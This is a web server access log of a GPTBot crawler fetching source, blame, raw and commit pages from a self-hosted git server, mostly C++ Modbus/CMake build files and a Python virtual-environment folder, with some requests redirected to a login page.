[Client 74.7.227.38] [Length 10255] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:17:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10049] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build" +[17/Feb/2026:17:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13441] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 10672] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:17:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12963] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13009] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11084] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10118] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:59:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:59:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:59:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:59:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9955] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10306] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10693] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 12963] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake" +[17/Feb/2026:17:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:17:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:17:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api" +[17/Feb/2026:17:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14329] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12857] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" [Client 74.7.227.38] [Length 19983] [Gzip 9.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10007] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11345] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/target-comm_core-0294a9f898b3d3c1002f.json" [Client 74.7.227.38] [Length 14821] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/cache-v2-2b34a30298af0dffde1b.json" [Client 74.7.227.38] [Length 33296] [Gzip 10.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11046] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13010] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:17:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14599] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9984] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:17:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 